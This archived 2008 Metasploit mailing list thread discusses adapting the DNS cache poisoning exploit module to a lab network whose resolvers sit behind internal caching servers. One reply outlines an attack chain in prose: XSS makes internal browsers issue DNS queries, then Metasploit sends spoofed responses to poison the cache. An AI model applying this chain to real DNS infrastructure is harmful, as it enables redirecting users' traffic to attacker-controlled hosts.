Metasploit mailing list archives

Exploit for the DNS cache poisoning vulnerability...

From: natron at invisibledenizen.org (natron)
Date: Thu, 24 Jul 2008 10:14:33 -0500

Juan, your scenario would be a difficult one to exploit with the current
code.  An external attacker would be able to send spoofed responses to your
DNS server, but would not be able to send requests to the server for
randomAAAAA.domain.com.  An external attacker could, in theory, modify the
request generating side of the msf exploit to use one of the ideas Jarrod
mentioned in the earlier email (e.g. XSS forcing an internal browser to fire
off DNS requests for you), then send the spoofed responses to wherever the
DNS server pops them out.

Something like:

1) XSS kicks off DNS request to attacker-controlled DNS server, telling
attacker the location of the victim's DNS server doing the internet-facing
resolving as well as what port(s) it's using
2) XSS kicks off AAAA.domain.com AAAB.domain.com etc
3) MSF spoofs responses and poisons the cache.

Nathan

2008/7/24 Juan Miguel Paredes <one.miguel at gmail.com>:

Thanks HD.

I'm trying to understand this and get this to work in our lab.

In our environment, we have internet-facing DNS servers.  The only systems
allowed to query the internet-facing DNS servers are internal DNS caching
servers.  All internal users can only query the caching servers.  (sorry,
I'm not a DNS guy so my terminology is wrong, I'm sure).  Attacker can't hit
either the internet-facing DNS server or the caching servers from outside.
An attacker would need to be inside the network to begin with.  No problem
there.  However, the attacker would also be forced to target the caching
servers. Additionally:

1.  The attacker would need to know which internet-facing DNS server the
caching server is working with at the time of the attack (or spoof them
all).
2.  Instead of spoofing the authority as in the msf module, the attacker
would have to spoof the internet-facing DNS servers.

After that, unpached DNS servers are game.  I'm in the process of modifying
the .rb modules for our environment, but I thought I should ask: am I on the
right track here or am I missing something?

Thanks.


On Wed, Jul 23, 2008 at 11:20 PM, H D Moore <hdm at metasploit.com> wrote:

Woops:
http://www.caughq.org/exploits/CAU-EX-2008-0002.txt
_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework



_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20080724/ccd9465c/attachment.htm>

Current thread:

Exploit for the DNS cache poisoning vulnerability... H D Moore (Jul 23)
- Exploit for the DNS cache poisoning vulnerability... H D Moore (Jul 23)
  - Exploit for the DNS cache poisoning vulnerability... Jarrod Frates (Jul 23)
    - Exploit for the DNS cache poisoning vulnerability... Jaime Blasco (Jul 24)
    - Exploit for the DNS cache poisoning vulnerability... H D Moore (Jul 24)
  - Exploit for the DNS cache poisoning vulnerability... Juan Miguel Paredes (Jul 24)
    - Exploit for the DNS cache poisoning vulnerability... natron (Jul 24)
    - Exploit for the DNS cache poisoning vulnerability... Jose Carlos Luna (Jul 24)
    - Exploit for the DNS cache poisoning vulnerability... Juan Miguel Paredes (Jul 24)